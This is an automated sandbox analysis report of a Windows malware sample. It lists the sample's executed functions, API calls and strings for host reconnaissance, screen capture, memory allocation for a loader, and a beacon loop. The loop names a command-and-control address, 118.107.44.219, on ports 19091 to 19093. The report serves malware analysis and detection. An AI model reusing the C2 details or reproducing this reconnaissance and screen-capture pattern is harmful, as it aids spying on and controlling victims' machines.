API calls 44010->44012 44013 2c377a6 44010->44013 44011 2c375b9 __CRT_INIT@12 149 API calls 44011->44008 44012->44013 44013->44008 44013->44011 44014->44001 44016 2c375c5 __commit 44015->44016 44017 2c37647 44016->44017 44018 2c375cd 44016->44018 44020 2c376a8 44017->44020 44021 2c3764d 44017->44021 44067 2c3803b HeapCreate 44018->44067 44022 2c37706 44020->44022 44023 2c376ad 44020->44023 44027 2c3766b 44021->44027 44033 2c375d6 __commit 44021->44033 44077 2c38306 66 API calls _doexit 44021->44077 44022->44033 44083 2c39a58 79 API calls __freefls@4 44022->44083 44025 2c39754 ___set_flsgetvalue 3 API calls 44023->44025 44024 2c375d2 44026 2c375dd 44024->44026 44024->44033 44029 2c376b2 44025->44029 44068 2c39ac6 86 API calls 4 library calls 44026->44068 44032 2c3767f 44027->44032 44078 2c3b0e4 67 API calls _free 44027->44078 44034 2c39fe4 __calloc_crt 66 API calls 44029->44034 44081 2c37692 70 API calls __mtterm 44032->44081 44033->44010 44038 2c376be 44034->44038 44035 2c375e2 __RTC_Initialize 44045 2c375f2 GetCommandLineA 44035->44045 44059 2c375e6 44035->44059 44038->44033 44040 2c376ca DecodePointer 44038->44040 44039 2c37675 44079 2c397a5 70 API calls _free 44039->44079 44046 2c376df 44040->44046 44043 2c375eb 44043->44033 44044 2c3767a 44080 2c38059 HeapDestroy 44044->44080 44070 2c3b468 71 API calls 2 library calls 44045->44070 44049 2c376e3 44046->44049 44050 2c376fa 44046->44050 44052 2c397e2 __CRT_INIT@12 66 API calls 44049->44052 44082 2c36e49 66 API calls 2 library calls 44050->44082 44051 2c37602 44071 2c3ae9f 73 API calls __calloc_crt 44051->44071 44056 2c376ea GetCurrentThreadId 44052->44056 44055 2c3760c 44064 2c37610 44055->44064 44073 2c3b3ad 95 API calls 3 library calls 44055->44073 44056->44033 44069 2c38059 HeapDestroy 44059->44069 44060 2c3761c 44061 2c37630 44060->44061 44074 2c3b137 94 API calls 6 library calls 44060->44074 44061->44043 44076 2c3b0e4 67 API calls _free 44061->44076 44072 2c397a5 70 API calls _free 44064->44072 44065 2c37625 44065->44061 44075 2c38119 77 API calls 4 library calls 44065->44075 44067->44024 44068->44035 44069->44043 44070->44051 44071->44055 44072->44059 44073->44060 44074->44065 44075->44061 44076->44064 44077->44027 44078->44039 44079->44044 44080->44032 44081->44033 44082->44033 44083->44033 44084 2c4f0df 44091 2c32c60 WSAStartup CreateEventW InterlockedExchange 44084->44091 44086 2c36f17 77 API calls 44087 2c4f0e4 44086->44087 44087->44086 44088 2c4f7db 44087->44088 44094 2c35a20 CreateEventW 44088->44094 44092 2c36815 __cftog_l 5 API calls 44091->44092 44093 2c32cff 44092->44093 44093->44087 44095 2c35a83 44094->44095 44096 2c35a79 44094->44096 44122 2c36410 HeapCreate 44095->44122 44128 2c31280 DeleteCriticalSection RaiseException __CxxThrowException@8 44096->44128 44100 2c35b12 44129 2c31280 DeleteCriticalSection RaiseException __CxxThrowException@8 44100->44129 44101 2c35b1c CreateEventW 44103 2c35b55 44101->44103 44104 2c35b5f CreateEventW 44101->44104 44130 2c31280 DeleteCriticalSection RaiseException __CxxThrowException@8 44103->44130 44106 2c35b84 CreateEventW 44104->44106 44107 2c35b7a 44104->44107 44109 2c35ba9 InitializeCriticalSectionAndSpinCount 44106->44109 44110 2c35b9f 44106->44110 44131 2c31280 DeleteCriticalSection RaiseException __CxxThrowException@8 44107->44131 44111 2c35c77 InitializeCriticalSectionAndSpinCount 44109->44111 44112 2c35c6d 44109->44112 44132 2c31280 DeleteCriticalSection RaiseException __CxxThrowException@8 44110->44132 44115 2c35c98 InterlockedExchange timeGetTime CreateEventW CreateEventW 44111->44115 44116 2c35c8e 44111->44116 44133 2c31280 DeleteCriticalSection RaiseException __CxxThrowException@8 44112->44133 44118 2c367ff 77 API calls 44115->44118 44134 2c31280 DeleteCriticalSection RaiseException __CxxThrowException@8 44116->44134 44119 2c35d2b 44118->44119 44120 2c367ff 77 API calls 44119->44120 44121 2c35d3b 44120->44121 44123 2c36441 44122->44123 44124 2c36437 44122->44124 44126 2c35af2 InitializeCriticalSectionAndSpinCount 44123->44126 44136 2c36e49 66 API calls 2 library calls 44123->44136 44135 2c31280 DeleteCriticalSection RaiseException __CxxThrowException@8 44124->44135 44126->44100 44126->44101 44128->44095 44129->44101 44130->44104 44131->44106 44132->44109 44133->44111 44134->44115 44135->44123 44136->44126

                                                                                                                            Executed Functions

                                                                                                                            Function 03625430 Relevance: 93.2, APIs: 40, Strings: 13, Instructions: 440stringnetworklibraryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 3625430-36254b7 call 362f707 call 3636770 * 3 gethostname gethostbyname 9 362555c-362569d MultiByteToWideChar * 2 GetLastInputInfo GetTickCount wsprintfW MultiByteToWideChar * 2 call 3627490 GetSystemInfo wsprintfW call 3626c50 call 3626ee0 GetForegroundWindow 0->9 10 36254bd-3625504 inet_ntoa call 36303cf * 2 0->10 23 36256b2-36256c0 9->23 24 362569f-36256ac GetWindowTextW 9->24 10->9 20 3625506-3625508 10->20 22 3625510-362555a inet_ntoa call 36303cf * 2 20->22 22->9 26 36256c2 23->26 27 36256cc-36256f0 lstrlenW call 3626d70 23->27 24->23 26->27 33 3625702-3625726 call 362f876 27->33 34 36256f2-36256ff call 362f876 27->34 39 3625732-3625756 lstrlenW call 3626d70 33->39 40 3625728 33->40 34->33 43 3625768-36257b9 GetModuleHandleW GetProcAddress 39->43 44 3625758-3625765 call 362f876 39->44 40->39 46 36257c6-36257cd GetSystemInfo 43->46 47 36257bb-36257c4 GetNativeSystemInfo 43->47 44->43 49 36257d3-36257e1 46->49 47->49 50 36257e3-36257eb 49->50 51 36257ed-36257f2 49->51 50->51 52 36257f4 50->52 53 36257f9-3625820 wsprintfW call 3626a70 GetCurrentProcessId 51->53 52->53 56 3625822-362583c OpenProcess 53->56 57 3625885-362588c call 3626690 53->57 56->57 58 362583e-3625853 K32GetProcessImageFileNameW 56->58 65 362589e-36258ab 57->65 66 362588e-362589c 57->66 60 3625855-362585c 58->60 61 362585e-3625866 call 36280f0 58->61 63 362587f CloseHandle 60->63 67 362586b-362586d 61->67 63->57 68 36258ac-36259a1 call 362f876 call 3626490 call 3626150 call 362fc0e GetTickCount call 363043c call 36303a8 wsprintfW GetLocaleInfoW GetSystemDirectoryW GetCurrentHwProfileW 65->68 66->68 69 3625878-362587e 67->69 70 362586f-3625876 67->70 83 36259a3-36259c8 68->83 84 36259ca-36259e9 68->84 69->63 70->63 85 36259ea-3625a14 call 3625a30 call 3623160 call 362efff 83->85 84->85 90 3625a19-3625a2e call 362f00a 85->90
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0362F707: _malloc.LIBCMT ref: 0362F721
                                                                                                                            • _memset.LIBCMT ref: 0362546C
                                                                                                                            • _memset.LIBCMT ref: 03625485
                                                                                                                            • _memset.LIBCMT ref: 03625495
                                                                                                                            • gethostname.WS2_32(?,00000032), ref: 036254A3
                                                                                                                            • gethostbyname.WS2_32(?), ref: 036254AD
                                                                                                                            • inet_ntoa.WS2_32 ref: 036254C5
                                                                                                                            • _strcat_s.LIBCMT ref: 036254D8
                                                                                                                            • _strcat_s.LIBCMT ref: 036254F1
                                                                                                                            • inet_ntoa.WS2_32 ref: 0362551A
                                                                                                                            • _strcat_s.LIBCMT ref: 0362552D
                                                                                                                            • _strcat_s.LIBCMT ref: 03625546
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03625573
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03625587
                                                                                                                            • GetLastInputInfo.USER32(?), ref: 0362559A
                                                                                                                            • GetTickCount.KERNEL32 ref: 036255A0
                                                                                                                            • wsprintfW.USER32 ref: 036255D5
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 036255E8
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000296,00000000), ref: 036255FC
                                                                                                                            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03625653
                                                                                                                            • wsprintfW.USER32 ref: 0362566C
                                                                                                                            • GetForegroundWindow.USER32 ref: 03625695
                                                                                                                            • GetWindowTextW.USER32(00000000,000006CE,000000FA), ref: 036256AC
                                                                                                                            • lstrlenW.KERNEL32(000008CC), ref: 036256D3
                                                                                                                            • lstrlenW.KERNEL32(00000994), ref: 03625739
                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 036257AA
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 036257B1
                                                                                                                            • GetNativeSystemInfo.KERNEL32(?), ref: 036257C2
                                                                                                                            • GetSystemInfo.KERNEL32(?), ref: 036257CD
                                                                                                                            • wsprintfW.USER32 ref: 03625806
                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 03625818
                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 0362582E
                                                                                                                            • K32GetProcessImageFileNameW.KERNEL32(00000000,?,00000104), ref: 0362584B
                                                                                                                            • CloseHandle.KERNEL32(03645164), ref: 0362587F
                                                                                                                            • GetTickCount.KERNEL32 ref: 036258E9
                                                                                                                            • __time64.LIBCMT ref: 036258F8
                                                                                                                            • __localtime64.LIBCMT ref: 0362592F
                                                                                                                            • wsprintfW.USER32 ref: 03625968
                                                                                                                            • GetLocaleInfoW.KERNEL32(00000800,00000002,00000F46,00000040), ref: 0362597D
                                                                                                                            • GetSystemDirectoryW.KERNEL32(00001184,00000032), ref: 0362598C
                                                                                                                            • GetCurrentHwProfileW.ADVAPI32(?), ref: 03625999
                                                                                                                              • Part of subcall function 036280F0: GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 03628132
                                                                                                                              • Part of subcall function 036280F0: lstrcmpiW.KERNEL32(?,A:\), ref: 03628166
                                                                                                                              • Part of subcall function 036280F0: lstrcmpiW.KERNEL32(?,B:\), ref: 03628176
                                                                                                                              • Part of subcall function 036280F0: QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 036281A6
                                                                                                                              • Part of subcall function 036280F0: lstrlenW.KERNEL32(?), ref: 036281B7
                                                                                                                              • Part of subcall function 036280F0: __wcsnicmp.LIBCMT ref: 036281CE
                                                                                                                              • Part of subcall function 036280F0: lstrcpyW.KERNEL32(00000AD4,?), ref: 03628204
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Info$ByteCharMultiSystemWide_strcat_swsprintf$Process_memsetlstrlen$CountCurrentHandleTickWindowinet_ntoalstrcmpi$AddressCloseDeviceDirectoryDriveFileForegroundImageInputLastLocaleLogicalModuleNameNativeOpenProcProfileQueryStringsText__localtime64__time64__wcsnicmp_mallocgethostbynamegethostnamelstrcpy
                                                                                                                            • String ID: %d min$1.0$2024.12. 3$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X86$X86 %s$kernel32.dll$x64$x86
                                                                                                                            • API String ID: 1101047656-1568689114
                                                                                                                            • Opcode ID: 7635fdc19f1a50b5280a78092be706a34309ba5766c0561e16fa8c0ad9e3e46f
                                                                                                                            • Instruction ID: ef2d809689ecf8016e70a15f407389073858748c3d5c02a402e02fbe4485f5ec
                                                                                                                            • Opcode Fuzzy Hash: 7635fdc19f1a50b5280a78092be706a34309ba5766c0561e16fa8c0ad9e3e46f
                                                                                                                            • Instruction Fuzzy Hash: F2F1E3B5A40714AFD724EB64CC85FEBBBB8AB45700F00455CF70AAB285EB70AA44CF55
                                                                                                                            Function 02880032 Relevance: 72.5, APIs: 3, Strings: 38, Instructions: 795memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetNativeSystemInfo.KERNEL32(?), ref: 028804AE
                                                                                                                            • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 028804DE
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 028804F5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135368981.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2880000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual$InfoNativeSystem
                                                                                                                            • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                                                                                                            • API String ID: 4117132724-2899676511
                                                                                                                            • Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                                            • Instruction ID: 8e6e1f8afc06ee510e5b2dbba922f1dd1134104d7621abea32ec05a6ecd2e281
                                                                                                                            • Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                                            • Instruction Fuzzy Hash: E1628B7A5083858FD730DF24C840BABBBE4FF94704F04482DE9C99B252E7749988CB56
                                                                                                                            Function 0362DF10 Relevance: 61.6, APIs: 24, Strings: 11, Instructions: 354sleepregistrysynchronizationCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 251 362df10-362df72 call 3630542 Sleep 254 362df97-362df9d 251->254 255 362df74-362df91 call 362f707 call 362fa29 CloseHandle 251->255 257 362dfa4-362e019 GetLocalTime wsprintfW SetUnhandledExceptionFilter call 362fa29 CloseHandle call 362f707 254->257 258 362df9f call 3627620 254->258 255->254 267 362e01b-362e026 call 3622c90 257->267 268 362e028 257->268 258->257 270 362e02c-362e046 call 362f707 267->270 268->270 274 362e054 270->274 275 362e048-362e049 call 3629730 270->275 277 362e058 274->277 278 362e04e-362e052 275->278 279 362e063-362e06f call 362ce00 277->279 278->277 282 362e071-362e0b7 call 362f876 * 2 279->282 283 362e0b9-362e0fa call 362f876 * 2 279->283 292 362e100-362e110 282->292 283->292 293 362e152-362e15a 292->293 294 362e112-362e14c call 362ce00 call 362f876 * 2 292->294 295 362e162-362e169 293->295 296 362e15c-362e15e 293->296 294->293 298 362e177-362e17b 295->298 299 362e16b-362e175 295->299 296->295 302 362e181-362e187 298->302 299->302 304 362e1c6-362e1ee call 3630542 call 3622da0 302->304 305 362e189-362e1a3 EnumWindows 302->305 312 362e200-362e2ac call 3630542 CreateEventA call 362f876 call 362ca70 304->312 313 362e1f0-362e1fb Sleep 304->313 305->304 307 362e1a5-362e1c4 Sleep EnumWindows 305->307 307->304 307->307 321 362e2b7-362e2bd 312->321 313->279 322 362e318-362e32c call 3625430 321->322 323 362e2bf-362e2f3 Sleep RegOpenKeyExW 321->323 327 362e331-362e337 322->327 325 362e311-362e316 323->325 326 362e2f5-362e30b RegQueryValueExW 323->326 325->321 325->322 326->325 328 362e36a-362e370 327->328 329 362e339-362e365 CloseHandle 327->329 330 362e372-362e38e call 362fa29 328->330 331 362e390 328->331 329->279 334 362e394 330->334 331->334 336 362e396-362e39d 334->336 337 362e39f-362e3ae Sleep 336->337 338 362e40d-362e420 336->338 337->336 339 362e3b0-362e3b7 337->339 342 362e432-362e46c call 3630542 Sleep CloseHandle 338->342 343 362e422-362e42c WaitForSingleObject CloseHandle 338->343 339->338 341 362e3b9-362e3cb 339->341 346 362e3dd-362e408 Sleep CloseHandle 341->346 347 362e3cd-362e3d7 WaitForSingleObject CloseHandle 341->347 342->279 343->342 346->279 347->346
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 03630542: __fassign.LIBCMT ref: 03630538
                                                                                                                            • Sleep.KERNEL32(00000000), ref: 0362DF64
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0362DF91
                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 0362DFA9
                                                                                                                            • wsprintfW.USER32 ref: 0362DFE0
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(036275B0), ref: 0362DFEE
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0362E007
                                                                                                                              • Part of subcall function 0362F707: _malloc.LIBCMT ref: 0362F721
                                                                                                                            • EnumWindows.USER32(03625CC0,?), ref: 0362E19D
                                                                                                                            • Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0362E1AA
                                                                                                                            • EnumWindows.USER32(03625CC0,?), ref: 0362E1BE
                                                                                                                            • Sleep.KERNEL32(00000BB8), ref: 0362E1F5
                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0362E241
                                                                                                                            • Sleep.KERNEL32(00000FA0), ref: 0362E2C4
                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 0362E2EB
                                                                                                                            • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0362E30B
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0362E35D
                                                                                                                            • Sleep.KERNEL32(000003E8,?,?), ref: 0362E3A4
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0362E3D0
                                                                                                                            • CloseHandle.KERNEL32(?,?,?), ref: 0362E3D7
                                                                                                                            • Sleep.KERNEL32(000003E8,?,?), ref: 0362E3E2
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0362E400
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0362E425
                                                                                                                            • CloseHandle.KERNEL32(?,?,?), ref: 0362E42C
                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?), ref: 0362E446
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0362E464
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleSleep$EnumObjectSingleWaitWindows$CreateEventExceptionFilterLocalOpenQueryTimeUnhandledValue__fassign_mallocwsprintf
                                                                                                                            • String ID: %4d.%2d.%2d-%2d:%2d:%2d$118.107.44.219$118.107.44.219$118.107.44.219$118.107.44.219$19091$19091$19092$19093$Console$IpDatespecial
                                                                                                                            • API String ID: 1511462596-472669843
                                                                                                                            • Opcode ID: 39d63efae47da3de42787a95c0fafa18efc90efd1058afccc07eb63a79ee1621
                                                                                                                            • Instruction ID: a439e76f8b4c8d446b3376e9a668d9037a12beb2a98dfd227af75df8090084e6
                                                                                                                            • Opcode Fuzzy Hash: 39d63efae47da3de42787a95c0fafa18efc90efd1058afccc07eb63a79ee1621
                                                                                                                            • Instruction Fuzzy Hash: 7AD1F4B4A44710AFD320EF60DC45E2BBFB8BB85700F115A2CF5658A289DB729445CF6B
                                                                                                                            Function 0362BC70 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 351windowCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetDesktopWindow.USER32 ref: 0362BC8F
                                                                                                                            • GetDC.USER32(00000000), ref: 0362BC9C
                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0362BCA2
                                                                                                                            • GetDC.USER32(00000000), ref: 0362BCAD
                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 0362BCBA
                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000076), ref: 0362BCC2
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0362BCD3
                                                                                                                            • GetSystemMetrics.USER32(0000004E), ref: 0362BCF8
                                                                                                                            • GetSystemMetrics.USER32(0000004F), ref: 0362BD26
                                                                                                                            • GetSystemMetrics.USER32(0000004C), ref: 0362BD78
                                                                                                                            • GetSystemMetrics.USER32(0000004D), ref: 0362BD8D
                                                                                                                            • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 0362BDA6
                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0362BDB4
                                                                                                                            • SetStretchBltMode.GDI32(?,00000003), ref: 0362BDC0
                                                                                                                            • GetSystemMetrics.USER32(0000004F), ref: 0362BDCD
                                                                                                                            • GetSystemMetrics.USER32(0000004E), ref: 0362BDE0
                                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,00000000), ref: 0362BE07
                                                                                                                            • _memset.LIBCMT ref: 0362BE7A
                                                                                                                            • GetDIBits.GDI32(?,?,00000000,00000000,?,00000028,00000000), ref: 0362BE97
                                                                                                                            • _memset.LIBCMT ref: 0362BEAF
                                                                                                                              • Part of subcall function 0362F707: _malloc.LIBCMT ref: 0362F721
                                                                                                                            • DeleteObject.GDI32(?), ref: 0362BF23
                                                                                                                            • DeleteObject.GDI32(?), ref: 0362BF2D
                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 0362BF39
                                                                                                                            • DeleteObject.GDI32(?), ref: 0362BFDF
                                                                                                                            • DeleteObject.GDI32(?), ref: 0362BFE9
                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 0362BFF5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch_memset$BitmapBitsDesktopModeSelectWindow_malloc
                                                                                                                            • String ID: ($6$gfff$gfff
                                                                                                                            • API String ID: 3293817703-713438465
                                                                                                                            • Opcode ID: 6dcd3621543ba3cb31213338588280971e6f34e8fc66ccc07d23db36f54a67f0
                                                                                                                            • Instruction ID: 99e739e8570515f0389aad347e50ebc9d1c8987bb703dad9b239dfa2e0ee5b5b
                                                                                                                            • Opcode Fuzzy Hash: 6dcd3621543ba3cb31213338588280971e6f34e8fc66ccc07d23db36f54a67f0
                                                                                                                            • Instruction Fuzzy Hash: B3D187B5E00318AFDB10EFE9E884A9EBBB9FF48700F154529F905AB244D770A941CF95
                                                                                                                            Function 03626A70 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 141memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetCurrentProcessId.KERNEL32(75BF73E0), ref: 03626A94
                                                                                                                            • wsprintfW.USER32 ref: 03626AA7
                                                                                                                              • Part of subcall function 03626910: GetCurrentProcessId.KERNEL32(95401134,00000000,00000000,75BF73E0,?,00000000,036410DB,000000FF,?,03626AB3,00000000), ref: 03626938
                                                                                                                              • Part of subcall function 03626910: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,036410DB,000000FF,?,03626AB3,00000000), ref: 03626947
                                                                                                                              • Part of subcall function 03626910: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,036410DB,000000FF,?,03626AB3,00000000), ref: 03626960
                                                                                                                              • Part of subcall function 03626910: CloseHandle.KERNEL32(00000000,?,00000000,036410DB,000000FF,?,03626AB3,00000000), ref: 0362696B
                                                                                                                            • _memset.LIBCMT ref: 03626AC2
                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 03626ADB
                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?), ref: 03626B12
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 03626B19
                                                                                                                            • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 03626B3F
                                                                                                                            • GetLastError.KERNEL32 ref: 03626B49
                                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 03626B5D
                                                                                                                            • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 03626B85
                                                                                                                            • GetSidSubAuthorityCount.ADVAPI32 ref: 03626B98
                                                                                                                            • GetSidSubAuthority.ADVAPI32(00000000), ref: 03626BA6
                                                                                                                            • LocalFree.KERNEL32(?), ref: 03626BB5
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 03626BC2
                                                                                                                            • wsprintfW.USER32 ref: 03626C1B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion_memset
                                                                                                                            • String ID: -N/$NO/$None/%s
                                                                                                                            • API String ID: 3036438616-3095023699
                                                                                                                            • Opcode ID: 3f6b150a2a3bd9fb3cccb8e85a79e3e9961e109bc4b4b18e4a31c4cb43e8931f
                                                                                                                            • Instruction ID: dc300f45db7dc3b1f04397f112693d0ef3204d17d658f67257543aa3fd2f88bb
                                                                                                                            • Opcode Fuzzy Hash: 3f6b150a2a3bd9fb3cccb8e85a79e3e9961e109bc4b4b18e4a31c4cb43e8931f
                                                                                                                            • Instruction Fuzzy Hash: 9E41B374E00624AFDB20EB60DD88FEA7F78EB0A701F154499F60696245DB74D990CFA1
                                                                                                                            Function 03627490 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 99registrylibraryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(ntdll.dll,75BF73E0,?,?,?,03625611,0000035E,000002FA), ref: 0362749C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 036274B2
                                                                                                                            • swprintf.LIBCMT ref: 036274EF
                                                                                                                              • Part of subcall function 03627410: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03627523), ref: 0362743D
                                                                                                                              • Part of subcall function 03627410: GetProcAddress.KERNEL32(00000000), ref: 03627444
                                                                                                                              • Part of subcall function 03627410: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03627523), ref: 03627452
                                                                                                                            • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 03627547
                                                                                                                            • RegQueryValueExW.KERNEL32(000002FA,ProductName,00000000,00000001,00000000,?), ref: 03627563
                                                                                                                            • RegCloseKey.KERNEL32(000002FA), ref: 03627586
                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,03625611,0000035E,000002FA), ref: 03627598
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValueswprintf
                                                                                                                            • String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                                                                                                                            • API String ID: 2158625971-3190923360
                                                                                                                            • Opcode ID: 116bd9f7390849a690f4bc93a3ef931e064d137b67c390e556c8083e210131b2
                                                                                                                            • Instruction ID: 6e29b12cc78692d3f8f01052fd88052763309b1503e1ccd68dab84a5133a8458
                                                                                                                            • Opcode Fuzzy Hash: 116bd9f7390849a690f4bc93a3ef931e064d137b67c390e556c8083e210131b2
                                                                                                                            • Instruction Fuzzy Hash: 073186B5B40318BFD714EBA4DD45FBFBBBCDB48740F144519BA06A6285EA70DA00CBA0
